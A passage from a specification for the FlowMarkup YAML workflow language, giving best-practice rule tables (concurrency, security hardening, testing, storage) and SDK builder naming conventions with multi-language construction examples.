| R-CONC-1 | Use `transaction: true` for multi-step atomic operations on shared state | Transaction groups fork variable scopes — isolated working copy, atomic commit on success, automatic discard on error |
| R-CONC-2 | Prefer EXCLUSIVE locks; use SHARED only for read-heavy snapshot patterns | EXCLUSIVE provides the strongest guarantee. SHARED allows multiple concurrent readers but no writes — use for cache reads, config lookups |
| R-CONC-3 | Add `rollback:` handlers for compensating external side effects | `transaction: true` only rolls back variable state. External mutations (payments, reservations, API calls) require explicit compensation via `rollback:` |
| R-CONC-4 | Design rollback handlers to be idempotent and add retry policies to them | Rollback may be retried on failure. Use `retry:` on rollback steps. `onRollbackError: CONTINUE` permits partial compensation |
| R-CONC-5 | Acquire locks in a consistent order across all flows to avoid deadlocks | If Flow A acquires `[lock1, lock2]`, all flows must acquire in the same order. Always set `timeout:` on locks to detect deadlocks early |
| R-CONC-6 | Avoid writing the same variable from concurrent PARALLEL branches — use `lock:` or `transaction: true` if necessary | Concurrent branches that write the same variable have undefined results (last-writer-wins). Use `lock:` for coordinated writes or `transaction: true` for isolated scopes |
| R-CONC-7 | **`lock:` vs `transaction:`** — use `lock:` for mutual exclusion without rollback; use `transaction: true` when you need automatic variable rollback on error | `lock:` provides serializable access (EXCLUSIVE) or concurrent reads (SHARED) but does NOT roll back variable writes on failure. `transaction: true` forks variable scopes and discards the fork on error. If you need both rollback and external compensation, combine `transaction: true` with `rollback:` handlers. Do not combine `lock:` with `transaction:` on the same scope — SA-ROLLBACK-3 warns because `transaction:` already provides serializable isolation |

### 8.6 Execution Mode Selection (R-EXEC-\*)

| ID | Rule | Rationale |
|---|---|---|
| R-EXEC-1 | Use `PARALLEL` group mode when all branches must complete and order doesn't matter | Ideal for enrichment calls, fan-out/fan-in. Use `failPolicy: COMPLETE` to collect all results before failing |
| R-EXEC-2 | Use `RACE` mode when the first successful result is sufficient | Competing LLM providers, geo-distributed API fallback, fastest-wins patterns. RACE cancels in-flight branches non-transactionally — add `rollback:` if branches have side effects |
| R-EXEC-3 | Use `async: true` only for non-critical side effects (notifications, metrics, cache warming) — never for critical paths | Async errors are logged but not propagated; results are discarded. CONTEXT is deep-cloned (changes don't propagate back). SA-ERR-6 |
| R-EXEC-4 | In concurrent `forEach`, set `maxConcurrency` to protect downstream resources | Start with 5–10 for external APIs. Use `rateLimit:` (GLOBAL scope) to share quota across flow instances. Use `completionCondition` for "fast enough" / quorum semantics |
| R-EXEC-5 | In PARALLEL mode, never assume branch execution order — use `dependsOn:` for explicit DAG dependencies | PARALLEL branches execute concurrently; result order is non-deterministic |

Example (R-EXEC-2):
```yaml
# RACE: use fastest LLM provider
- race:
    openai:
    - call: { service: openai, operation: complete, result: response }
    anthropic:
    - call: { service: anthropic, operation: complete, result: response }
```

### 8.7 Flow Design (R-MOD-\*)

| ID | Rule | Rationale |
|---|---|---|
| R-MOD-1 | Declare typed contracts (`input:/output:/throws:`) on every flow | Contracts are documentation, enable static analysis, and catch integration errors at load time. Use `examples:` block with one example per major code path |
| R-MOD-2 | Extract reusable logic into sub-flows via `run:` | Improves reuse, testability, and capability isolation. Sub-flows are bounded by their own `requires:` intersected with caller capabilities |
| R-MOD-3 | Move repeated CEL logic into `functions:` | Eliminates copy-paste, improves readability. Functions are pure CEL (no side effects, no recursion — SA-FN-2/SA-FN-3) |
| R-MOD-4 | Use flow-level `defaults:` to set baseline resilience policies; override at group or step level | Pyramid pattern: flow (broad baseline) → group (domain-specific) → step (exceptions). Step-level values replace (not merge) defaults |
| R-MOD-5 | Provide `examples:` block with named test cases covering happy path, error paths, and edge cases | Enables documentation, smoke testing, and contract verification. SA-EX-1..4 validate conformance |

### 8.8 Expression Hygiene (R-EXPR-\*)

| ID | Rule | Rationale |
|---|---|---|
| R-EXPR-1 | Use `=` prefix consistently — `=expr` for CEL, plain for literals, `{{ }}` for template interpolation | SA-QUOTE-1/SA-QUOTE-2 enforce. Quotes go outside `=`: `"=expr"` is correct, `="expr"` is wrong |
| R-EXPR-2 | Use `has(SECRET.name)` to check secret existence — `SecretValue` doesn't support equality comparison | SA-SECRET-6/SA-SECRET-8. `condition: =has(SECRET.smtp_creds)` is the correct guard |
| R-EXPR-3 | Quote `switch/match:` keys that collide with YAML 1.2 reserved forms (`true`, `false`, `null`, numbers) | YAML 1.2 parses bare `true` as boolean. Write `'true':` not `true:` when string matching is intended |
| R-EXPR-4 | Use YAML block scalars (`>-`) for long CEL expressions | Multi-line CEL is more readable with `>-` line continuation than single-line strings |
| R-EXPR-5 | Use `size()` not `length()` for strings and collections in CEL | CEL uses `size()`. `length()` is not a CEL function |

### 8.9 Observability (R-OBS-\*)

| ID | Rule | Rationale |
|---|---|---|
| R-OBS-1 | Add `_label_` to every action step and complex group | `_label_` appears in OpenTelemetry span names (`{type}:{_label_}`). Without labels, traces show generic `call[0]`, `call[1]` |
| R-OBS-2 | Add `_id_` to steps that are referenced in error handling, testing, or operational monitoring | `_id_` provides a stable programmatic identifier for step-level analysis. Use `snake_case` |
| R-OBS-3 | Log at phase boundaries — entry, critical transitions, success, and failure | Pattern: `log: "Starting payment..."` → action → `log: "Payment completed: {{payment_tx}}"`. Use WARN for retries and fallback paths, ERROR only for unrecoverable failures |
| R-OBS-4 | Include correlation ID in log messages for end-to-end tracing | `log: "Order {{order.id}} shipped ({{CONTEXT.correlation_id}})"` enables log aggregation across the execution chain |
| R-OBS-5 | Use `_meta_:` for structured operational metadata (SLO targets, team ownership, alert thresholds) | `_meta_: { slo_ms: 5000, owner: platform-team }` — machine-readable, not visible in traces but available for tooling |

### 8.10 Idempotency and Event Design (R-IDEMP-\*)

| ID | Rule | Rationale |
|---|---|---|
| R-IDEMP-1 | Add `idempotencyKey:` to flows that perform side effects (payments, provisioning, state mutations) — omit for read-only flows | `DuplicateInvocationError` (non-retryable) on duplicate. Keys must be deterministic — SA-IDEMP-1 (ERROR) rejects `now()` in idempotency keys |
| R-IDEMP-2 | Use composite idempotency keys (3+ parts) to minimize false collisions | Bad: `=order_id` (reused across tenants). Good: `="payment:" + CONTEXT.tenant_id + ":" + order_id + ":" + amount` |
| R-IDEMP-3 | Use LOCAL scope for single-flow event coordination; CONTEXT for parent/sub-flow; GLOBAL for cross-flow signaling | Match event scope to the coordination boundary. GLOBAL is higher latency — only for inter-flow synchronization |
| R-IDEMP-4 | Define `events:` contracts with explicit `data:` schemas and include correlation IDs | `data: { order_id: =order_id, correlation_id: =CONTEXT.correlation_id }` enables event tracing |

### 8.11 Service Configuration (R-SVC-\*)

| ID | Rule | Rationale |
|---|---|---|
| R-SVC-1 | Use explicit `call:` steps (not inline CEL calls) for operations needing retry, timeout, or circuit breaker | Inline `SERVICES.db.scalar(...)` has bare execution — no resilience wrapping. Use for simple lookups/guards only |
| R-SVC-2 | Inject environment-specific service properties via `ENV.*`/`SECRET.*` to enable same flow on dev/staging/prod | `properties: { host: =ENV.DB_HOST, password: =SECRET.db_password }` — never hardcode connection details |
| R-SVC-3 | Use service remapping (`cap: { SERVICES: { db: =SERVICES.test_db } }`) on `run:` steps for test doubles and failover | Enables same sub-flow to talk to different backends without code changes |
| R-SVC-4 | Action providers MAY return credential material — flow authors MUST protect returned values | Providers MAY return credential material (tokens, connection strings, dynamic credentials). Flow authors MUST protect such values using `$secret: true` or `$exportable: false` on receiving variables. SA-TAINT-4 (ERROR) flags when a result variable receiving auth/credential output lacks taint annotation. Prefer `$secret: true` for full opacity or `$exportable: false` for values needing computation |

### 8.12 Version Migration (R-VER-\*)

| ID | Rule | Rationale |
|---|---|---|
| R-VER-1 | Add `onVersionChange:` for long-running checkpointed flows that may be upgraded mid-execution | Handles checkpoint resume after flow definition changes. Omit for short-lived or non-checkpointed flows |
| R-VER-2 | Design migration handlers to be idempotent — checkpoint is preserved on error for retry | Reject incompatible migrations early: `throw: { condition: =MIGRATION.OLD_VERSION < 2, error: IncompatibleVersionError }` |
| R-VER-3 | Bump `version:` only on breaking changes to input/output/vars; use `documentation:` to note what changed | Enables callers to detect incompatibilities at load time |

### 8.13 Testing Strategy (R-TEST-\*)

| ID | Rule | Rationale |
|---|---|---|
| R-TEST-1 | Use UNIT tier for business logic (fast, hermetic, all services mocked); INTEGRATION tier for service interaction contracts | UNIT tests run on developer machines. INTEGRATION tests nightly against staging. See FLOWMARKUP-TESTING.md §1, Test tiers |
| R-TEST-2 | Provide at least one `examples:` entry per major code path (happy path, each error path, boundary conditions) | Flow-level `examples:` enable documentation, smoke tests, and contract verification |
| R-TEST-3 | Test timeout and error paths explicitly — mock services with `delay: >timeout` and error responses | Verify `TimeoutError` is thrown and caught correctly. Use virtual time to avoid real delays |
| R-TEST-4 | Use stateful mocks for flows with retry/fallback patterns — simulate initial failure then success | Validates that retry logic actually recovers. See FLOWMARKUP-TESTING.md §4.10 |

### 8.14 Storage and SSH (R-SEC-13+)

| ID | Rule | Rationale |
|---|---|---|
| R-SEC-13 | Prefer read-only STORAGE grants — use `STORAGE: { "s3://bucket/*": [get, list] }` or `STORAGE: { data: [get, list] }` instead of `STORAGE: [data]` | Grant minimum operations needed. `STORAGE: [data]` gives full access (all operations). Explicit operation lists limit blast radius |
| R-SEC-14 | Use URL-pattern restrictions for shared storage — use `STORAGE: { "s3://bucket/public/*": [get, list] }` or alias with `paths:`: `STORAGE: { data: { operations: [get], paths: ["public/*"] } }` | URL-pattern or path-prefix restrictions scope each flow's access. Without them, any flow with `get` can read any path on the backend |
| R-SEC-15 | Avoid SSH interpreters — same as R-SEC-8 for EXEC. Prefer specific executables over general-purpose interpreters in SSH allowlists | `SSH: { "server.example.com": [python3] }` effectively grants arbitrary remote code execution. SA-SSH-3 (ERROR) rejects this. Use `SSH: { "server.example.com": [deploy.sh, rsync] }` |
| R-SEC-16 | Prefer `transfer` over variable piping for large files | `transfer` uses streaming pipes and avoids memory pressure. Variable piping (`get` then `put`) materializes the entire file in flow memory |

### 8.15 Security Hardening (R-SEC-17+)

| ID | Rule | Rationale |
|---|---|---|
| R-SEC-17 | Prefer static `request.url` values; use CEL-derived URLs only with SSRF allowlists | CEL-derived URLs bypass static analysis origin validation. When dynamic URLs are necessary, configure explicit SSRF allowlists (scheme, host, port range) and rely on the engine's runtime SSRF prevention (§4.3). SA-REQ-15 flags dynamic `request.url` expressions |
| R-SEC-18 | Set `forEach.maxItems` explicitly for all user-input-driven iterations | Without `maxItems`, an attacker-controlled collection can cause the engine to iterate millions of times (CWE-770). SA-FOREACH-3 flags missing `maxItems` on user-controlled input. Default is 10,000 but explicitly setting the value documents intent and enables per-use-case tuning |
| R-SEC-19 | Use lock name prefixes scoped to the flow's domain to prevent namespace collisions | Lock names are automatically namespaced by flow ID and tenant ID (§3.21), but using descriptive domain-scoped prefixes (e.g., `payments.balance`, `inventory.stock`) improves auditability and prevents logical collisions within the same flow. SA-LOCK-10 flags user-derived lock names |
| R-SEC-20 | Prefer `mail.to` allowlists over open recipient fields for automated email steps | `MAIL: true` allows sending to any address, enabling open-relay abuse. Use `MAIL: ["@company.com"]` to restrict recipients. SA-MAIL-20 warns when recipient fields derive from user input with unrestricted MAIL capability |
| R-SEC-21 | Avoid `cap: INHERIT` — prefer explicit, minimal capability grants on `run` steps | `cap: INHERIT` forwards the caller's full capability set, violating least-privilege (CWE-250). SA-RUN-18 and SA-CAP-5 flag this. Explicit enumeration limits blast radius and makes security audits tractable |
| R-SEC-22 | Consider absolute paths in `exec.command`/`ssh.command` field values when PATH-based hijacking is a concern (capability declarations use bare names per schema) | Capability declarations (`requires.EXEC`, `cap.EXEC`) always use bare executable names (schema-enforced pattern). The `exec.command` and `ssh.command` *field values* MAY use absolute paths in environments where PATH-based hijacking is a concern (note: SA-EXEC-3 warns on path separators as a portability trade-off). Bare names are acceptable when the engine controls PATH resolution. SA-EXEC-10 and SA-SSH-3 enforce the interpreter denylist |
| R-SEC-23 | Always use `timeout:` on service calls, HTTP requests, exec, and SSH steps | Without explicit timeouts, steps can block indefinitely, consuming engine resources and potentially causing cascading failures. Set timeouts appropriate to the expected operation duration |
| R-SEC-24 | Prefer domain-restricted MAIL capability (`MAIL: ["@domain.com"]`) over `MAIL: true` | Unrestricted MAIL capability allows sending to any address, enabling open-relay abuse. Domain-restricted grants limit blast radius and align with least-privilege principles |
| R-SEC-25 | Always include `cap:` restrictions on sub-flow `run:` steps to follow least privilege | Omitting `cap:` on `run:` steps passes through the caller's full capability set. Explicit `cap:` grants document intent and limit the sub-flow's access to only what it needs |
| R-SEC-26 | Declare `events:` contracts for all flows using emit/waitFor | Event contracts enable static analysis of event type compatibility, payload schemas, and dead-letter detection. Without contracts, event-driven flows are opaque to validation |
| R-SEC-27 | Use `$format` patterns on path-type input parameters to prevent traversal | `$format` annotations on path-like inputs enable SA rules to detect potential path traversal. Without them, user-supplied paths may bypass validation |
| R-SEC-28 | Always include `integrity:` on remote flow references in production | Without `integrity:` verification, remote flow references are vulnerable to supply-chain attacks. The `integrity:` field pins the flow to a specific content hash, ensuring that the referenced flow has not been tampered with |

### 8.16 Document Store Compatibility (R-STORE-*)

FlowMarkup's `$name` metadata convention (`$kind`, `$type`, `$format`, etc.) is structurally isolated from MongoDB and Elasticsearch operator semantics. The `$`-prefixed keys are nested inside declaration contexts (`input:`, `vars:`, `const:`, `throws:`, `yields:`, `requires:`) and never appear at the document root or in serialized runtime state. Value Projection (§2.4) strips all metadata before checkpoint serialization — only `$text` from XML-to-MAP conversion may appear as a data key. The collision risk is further mitigated because metadata is accessed via the `meta()` CEL macro, not dot-access on `$`-prefixed properties.

| ID | Rule | Rationale |
|---|---|---|
| R-STORE-1 | Flow definitions MAY be stored as documents in MongoDB 5.0+ without modification — `$`-prefixed metadata keys are nested inside declaration contexts and do not conflict with MongoDB operators | MongoDB 5.0+ allows `$`-prefixed field names in stored documents. FlowMarkup `$` keys never appear at the document root. |
| R-STORE-2 | Engines SHOULD store the raw YAML/JSON source as a string field alongside the parsed document | `contentHash` (for `onVersionChange:`) is SHA-256 of original bytes; re-serialized documents may differ |
| R-STORE-3 | Engines MUST NOT use MongoDB Extended JSON as the serialization format for flow definitions — use standard JSON or BSON via native driver | `$type` collision: FlowMarkup uses `$type` for MIME type, Extended JSON v2 uses `$type` for BSON type wrappers. CEL-level collision is fully eliminated by the `meta()` macro approach; the remaining concern is serialization-format level only. |
| R-STORE-4 | Checkpoint `variables` map contains projected raw values only — `$`-prefixed metadata is engine-internal and MUST NOT appear in serialized state | Value Projection (§2.4) guarantees metadata stripping. Only `$text` from XML-to-MAP conversion may appear as a data key. `$text` is the only known `$`-prefixed runtime data key. |
| R-STORE-5 | Flow definitions and checkpoint data MAY be indexed in Elasticsearch without modification. Use field aliases in index templates if Kibana needs `$`-prefixed field access. | Elasticsearch has no `$`-prefix restrictions; Kibana UI has cosmetic limitations with `$`-prefixed field names. |

### 8.17 SDK and Builder API Guidelines (R-SDK-*)

FlowMarkup is a YAML data format — flows are authored, stored, and exchanged as YAML (or JSON) documents. SDKs in any programming language may provide construction APIs for building flow documents programmatically. This section defines cross-language conventions that ensure consistent API surfaces regardless of implementation language.

The core challenge: several directive names (`if`, `while`, `switch`, `try`, `return`, `break`, `continue`, `throw`, `yield`, `assert`, `lock`) and several sub-keys (`do`, `catch`, `finally`, `else`, `default`, `match`, `async`, `as`, `from`) collide with reserved words across Java, Python, JavaScript/TypeScript, C#, Go, Rust, Kotlin, Swift, Ruby, and/or PHP. While these are harmless as YAML string keys, they cannot be used as method or function names in most languages.

#### 8.17.1 Map Construction (Primary Pattern)

The primary SDK construction path uses nested maps (dictionaries, hash maps) with string keys. This approach has **zero keyword conflicts** in any language, maps 1:1 to YAML output, and requires no special naming conventions.

| ID | Rule | Rationale |
|---|---|---|
| R-SDK-1 | SDKs MUST support map/dictionary-based flow construction with string keys as the primary construction API | String keys bypass all reserved-word conflicts. Works identically in every language. |
| R-SDK-2 | Map construction output MUST serialize to spec-compliant YAML or JSON without post-processing | The map structure IS the flow — no intermediate representation needed |

**Examples across languages:**

Python:
```python
flow = {
    "name": "order_flow",
    "requires": {},
    "do": [
        {"try": {
            "do": [
                {"if": {
                    "condition": "=order.total > 1000",
                    "then": [{"log": "High-value order"}]
                }}
            ],
            "catch": {
                "default": [{"log": "Error: {{ERROR.MESSAGE}}"}]
            }
        }}
    ]
}
```

Java:
```java
Map<String, Object> flow = Map.of(
    "name", "order_flow",
    "requires", Map.of(),
    "do", List.of(
        Map.of("try", Map.of(
            "do", List.of(
                Map.of("if", Map.of(
                    "condition", "=order.total > 1000",
                    "then", List.of(Map.of("log", "High-value order"))
                ))
            ),
            "catch", Map.of(
                "default", List.of(Map.of("log", "Error: {{ERROR.MESSAGE}}"))
            )
        ))
    )
);
```

JavaScript/TypeScript:
```typescript
const flow = {
    name: "order_flow",
    requires: {},
    do: [
        { try: {
            do: [
                { if: {
                    condition: "=order.total > 1000",
                    then: [{ log: "High-value order" }]
                }}
            ],
            catch: {
                default: [{ log: "Error: {{ERROR.MESSAGE}}" }]
            }
        }}
    ]
};
```

Go:
```go
flow := map[string]any{
    "name": "order_flow",
    "requires": map[string]any{},
    "do": []any{
        map[string]any{"try": map[string]any{
            "do": []any{
                map[string]any{"if": map[string]any{
                    "condition": "=order.total > 1000",
                    "then": []any{map[string]any{"log": "High-value order"}},
                }},
            },
            "catch": map[string]any{
                "default": []any{map[string]any{"log": "Error: {{ERROR.MESSAGE}}"}},
            },
        }},
    },
}
```

Rust:
```rust
use serde_json::json;
let flow = json!({
    "name": "order_flow",
    "requires": {},
    "do": [
        {"try": {
            "do": [
                {"if": {
                    "condition": "=order.total > 1000",
                    "then": [{"log": "High-value order"}]
                }}
            ],
            "catch": {
                "default": [{"log": "Error: {{ERROR.MESSAGE}}"}]
            }
        }}
    ]
});
```

#### 8.17.2 Fluent Builder API Convention

For SDKs that provide typed, auto-completing builder APIs, the following universal naming convention avoids reserved-word conflicts in all target languages simultaneously. No language-specific escape mechanisms (backticks, `@` prefixes, trailing underscores) are permitted — a single set of names works everywhere.

| ID | Rule | Rationale |
|---|---|---|
| R-SDK-3 | Fluent builder methods for directives and actions MUST use the `<yamlKey>Step()` naming pattern | `tryStep()`, `ifStep()`, `returnStep()` are valid identifiers in every language even though `try`, `if`, `return` are reserved |
| R-SDK-4 | Non-conflicting directives SHOULD use the `<yamlKey>Step()` suffix for consistency, and MAY additionally provide unsuffixed aliases (e.g., `group()` alongside `groupStep()`) | Uniform suffix prevents SDK authors from needing to track which names conflict where |
| R-SDK-5 | Conflicting sub-keys MUST use `<yamlKey><Suffix>()` where the suffix describes the key's semantic role | The original key name remains the prefix for instant recognition; the suffix disambiguates from reserved words |
| R-SDK-6 | Builder output MUST serialize to spec-compliant YAML. Builders SHOULD support shorthand forms but MUST produce valid full-form YAML at minimum | The builder is purely a construction convenience — the canonical form is always YAML |

**Directive builder methods (conflicting — MUST use suffix):**

| YAML directive | Builder method |
|---|---|
| `if` | `ifStep()` |
| `while` | `whileStep()` |
| `switch` | `switchStep()` |
| `try` | `tryStep()` |
| `return` | `returnStep()` |
| `break` | `breakStep()` |
| `continue` | `continueStep()` |
| `throw` | `throwStep()` |
| `yield` | `yieldStep()` |
| `assert` | `assertStep()` |
| `lock` | `lockStep()` |

**Directive builder methods (non-conflicting — SHOULD use suffix, MAY provide alias):**

| YAML directive | Builder method | Alias permitted |
|---|---|---|
| `group` | `groupStep()` | `group()` |
| `forEach` | `forEachStep()` | `forEach()` |
| `repeat` | `repeatStep()` | `repeat()` |
| `set` | `setStep()` | `set()` |
| `log` | `logStep()` | `log()` |
| `logWarn` | `logWarnStep()` | `logWarn()` |
| `logError` | `logErrorStep()` | `logError()` |
| `emit` | `emitStep()` | `emit()` |
| `waitFor` | `waitForStep()` | `waitFor()` |
| `waitUntil` | `waitUntilStep()` | `waitUntil()` |
| `wait` | `waitStep()` | `wait()` |
| `cancel` | `cancelStep()` | `cancel()` |
| `parallel` | `parallelStep()` | `parallel()` |
| `race` | `raceStep()` | `race()` |

**Action builder methods (none conflict — SHOULD use suffix for uniformity):**

| YAML action | Builder method | Alias permitted |
|---|---|---|
| `call` | `callStep()` | `call()` |
| `run` | `runStep()` | `run()` |
| `exec` | `execStep()` | `exec()` |
| `request` | `requestStep()` | `request()` |
| `mail` | `mailStep()` | `mail()` |

**Conflicting sub-key methods:**

| YAML key | Used in | Builder method | Suffix rationale |
|---|---|---|---|
| `do` | group, forEach, while, repeat, try, lock + flow root | `doBody()` | Body = step list container |
| `catch` | try, actions, flow root | `catchErrors()` | Errors = what catch handles |
| `finally` | try, flow root | `finallyBlock()` | Block = structural block |
| `else` | if | `elseBlock()` | Block = structural block |
| `default` | switch | `defaultCase()` | Case = switch case terminology |
| `match` | switch | `matchCases()` | Cases = collection of match cases |
| `async` | all actions | `asyncMode()` | Mode = boolean configuration flag |
| `as` | forEach | `asVar()` | Var = names the loop variable |
| `from` | mail | `fromAddress()` | Address = mail sender address |

Non-conflicting sub-keys use their YAML names directly: `condition()`, `then()`, `elseIf()`, `items()`, `index()`, `until()`, `value()`, `timeout()`, `retry()`, `rateLimit()`, `circuitBreaker()`, `result()`, `params()`, `service()`, `operation()`, `flow()`, `handle()`, `cap()`, `command()`, `args()`, `url()`, `method()`, `headers()`, `body()`, `subject()`, `to()`, `message()`, `data()`, `event()`, `source()`, `capture()`, etc.

**Annotation methods:**

| YAML key | Builder method |
|---|---|
| `_id_` | `id()` |
| `_label_` | `label()` |
| `_notes_` | `notes()` |
| `_meta_` | `meta()` |

**CEL expression helpers:**

| Helper | Purpose | Example |
|---|---|---|
| `expression("expr")` | Wraps value with `=` prefix | `expression("x > 0")` → `"=x > 0"` |
| `template("text {{expr}}")` | Template interpolation (passthrough, for clarity) | |
| `duration("5s")` | Duration literal (passthrough, for clarity) | |

#### 8.17.3 Complete Example

**YAML:**
```yaml
- try:
    do:
    - forEach:
        items: =order.items
        as: item
        do:
        - call:
            service: inventory
            operation: reserve
            params:
              sku: =item.sku
              quantity: =item.quantity
            result:
              reservation_id: =RESULT.id
            async: true
    catch:
      InventoryError:
      - log: "Stock unavailable: {{ERROR.MESSAGE}}"
      default:
      - throw:
          error: OrderFailedError
          message: =ERROR.MESSAGE
    finally:
    - log: "Order processing complete"
```

**Universal builder (pseudocode — works identically across all target languages):**
```
tryStep(
  doBody(
    forEachStep(
      items(expression("order.items")),
      asVar("item"),
      doBody(
        callStep(
          service("inventory"),
          operation("reserve"),
          params(
            "sku", expression("item.sku"),
            "quantity", expression("item.quantity")
          ),
          result("reservation_id", expression("RESULT.id")),
          asyncMode(true)
        )
      )
    )
  ),
  catchErrors(
    "InventoryError", list(
      logStep("Stock unavailable: {{ERROR.MESSAGE}}")
    ),
    defaultCase(list(
      throwStep(
        error("OrderFailedError"),
        message(expression("ERROR.MESSAGE"))
      )
    ))
  ),
  finallyBlock(
    logStep("Order processing complete")
  )
)
```

#### 8.17.4 Serialization Requirements

| ID | Rule | Rationale |
|---|---|---|
| R-SDK-7 | Builder objects MUST provide a `toYaml()` or equivalent serialization method that produces spec-compliant YAML | Builders are construction helpers — the canonical exchange format is always YAML |
| R-SDK-8 | Builders SHOULD support shorthand forms (string retry, capture list, single-step unwrapping, `params:` null-value, `catch:` map form, etc.) but MUST produce valid full-form YAML at minimum | Shorthands improve readability but full-form is always correct |
| R-SDK-9 | Builder APIs MUST NOT introduce constructor-only features that have no YAML equivalent — every builder-constructed flow must be expressible as hand-written YAML | Prevents SDK lock-in; YAML remains the authoritative format |

#### 8.17.5 Complete Conflict Inventory

For reference, the following table documents all YAML key / reserved-word conflicts across target languages. An `X` indicates the key is a reserved word or keyword in that language; `~` indicates a soft keyword (contextual, but best avoided).

**Directive names (those that conflict in at least one language):**

| Directive | Java | Python | JS/TS | C# | Go | Rust | Kotlin | Swift | Ruby |
|---|:---:|:---:|:---:|:---:|:---:|:---:|:---:|:---:|:---:|
| `if` | X | X | X | X | X | X | X | X | X |
| `while` | X | X | X | X | — | X | X | X | X |
| `switch` | X | — | X | X | X | X | — | X | — |
| `try` | X | X | X | X | — | X | X | X | — |
| `return` | X | X | X | X | X | X | X | X | X |
| `break` | X | X | X | X | X | X | X | X | X |
| `continue` | X | X | X | X | X | X | X | X | X |
| `throw` | X | — | X | X | — | — | X | X | X |
| `yield` | — | X | X | X | — | X | — | — | X |
| `assert` | X | X | — | — | — | X | — | — | — |
| `lock` | — | — | — | X | — | — | — | — | — |

**Sub-key names (those that conflict in at least one language):**

| Key | Used in | Java | Python | JS/TS | C# | Go | Rust | Kotlin | Swift | Ruby |
|---|---|:---:|:---:|:---:|:---:|:---:|:---:|:---:|:---:|:---:|
| `do` | group, forEach, while, repeat, try, lock + flow root | X | — | — | X | — | — | X | X | X |
| `catch` | try, actions, flow root | X | — | X | X | — | — | ~ | X | X |
| `finally` | try, flow root | X | X | X | X | — | — | ~ | X | X |
| `else` | if | X | X | X | X | X | X | X | X | X |
| `default` | switch | X | — | X | X | X | — | — | X | — |
| `match` | switch | — | ~soft | — | — | — | X | — | — | — |
| `async` | all actions | — | X | X | X | — | X | — | — | — |
| `as` | forEach | — | X | — | X | — | X | X | — | — |
| `from` | mail | — | X | — | — | — | — | — | — | — |